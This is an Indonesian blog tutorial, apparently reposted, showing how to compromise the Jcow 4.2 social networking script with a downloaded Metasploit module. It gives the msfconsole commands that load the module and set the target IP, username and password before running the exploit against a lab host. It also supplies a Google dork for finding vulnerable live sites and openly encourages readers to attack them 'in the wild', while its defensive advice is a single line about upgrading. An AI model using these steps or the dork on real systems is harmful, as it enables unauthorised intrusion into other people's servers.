Jcow social networking…Ya, memang demikian namanya… Jcow menawarkan
aplikasi berbasis web untuk situs jejaring sosial secara gratis alias
free dan bisa dilihat di websitenya jcow.net dengan ukuran file yang
cukup kecil hanya 777KB tidak lebih dari 1 MB.
Tapi
disini yang akan saya bahas bukanlah mengenai penggunaan dari si Jcow
ini sebagai situs pertemanan, melainkan terdapatnya suatu vulnerability
dari beberapa versi dari Jcow yang ternyata dapat disusupi hanya dalam 4
langkah , dan bahkan si penyusup dapat melihat isi direktori web server korban(jika ternyata servernya pun tidak menerapkan pengamanan yang baik).
Pada contoh yang akan saya buat dibawah ini, korban menggunakan IP : 192.168.8.94…
Jauh lebih baik kalau kawan-kawan mau belajar menggunakan virtual lab
terlebih dahulu, tapi kalau ternyata penasaran ingin langsung to the
wild arena, kawan-kawan juga bisa cari via google dork : “Powered by Jcow 4.2.0“. Jika tertarik untuk langsung ke dunia nyata, kawan-kawan juga harus mempelajari logika dari teknik penyerangan via internet(klik disini)
O.S Penyerang : BT 5 R1
O.S Korban : XP SP3
Aplikasi vulnerable : Jcow 4.2
Pada artikel ini juga saya sebelumnya sudah membuat username : “victim dan password :”victim” pada aplikasi Jcow target.
Oke kita mulai langkah demi langkahnya dibawah ini
Kebutuhan :
1. Metasploit Framework (metasploit.com)
2. Script exploit jcow.rb (link mediafire di website asalnya)
Langkah-Langkahnya :
1. Copykan file exploit jcow.rb yang sudah di-download kedalam folder /pentest/exploits/framework/modules/exploits/remote/
cp jcow.rb /pentest/exploits/framework/modules/exploits/remote/
Jika bingung bagaimana cara meng-copy kan file exploit.rb kedalam Backtrack Linux, kawan-kawan bisa lihat tutorialnya disini.
2. Buka metasploit console dengan mengetikkan msfconsole pada terminal, lalu gunakan exploit yang sebelumnya sudah kita copy tadi.
msf > use exploit/remote/jcow
3. Selanjutnya ketikkan perintah show options untuk melihat switch apa saja yang dapat digunakan untuk exploit ini.
msf exploit(jcow) > set rhost 192.168.8.94 –> target IP
rhost => 192.168.8.94
msf exploit(jcow) > set username victim –> set username
username => victim
msf exploit(jcow) > set password victim –> set password
password => victim
4.
Yep setelah semuanya selesai dikonfigurasi dengan baik, langkah
terakhir tinggal menjalankan perintah exploit pada konsol metasploit.
Berhasil
Pengamanan :
1. Upgrade Jcow ke versi terbaru
Sumber : vishnuvalentino.com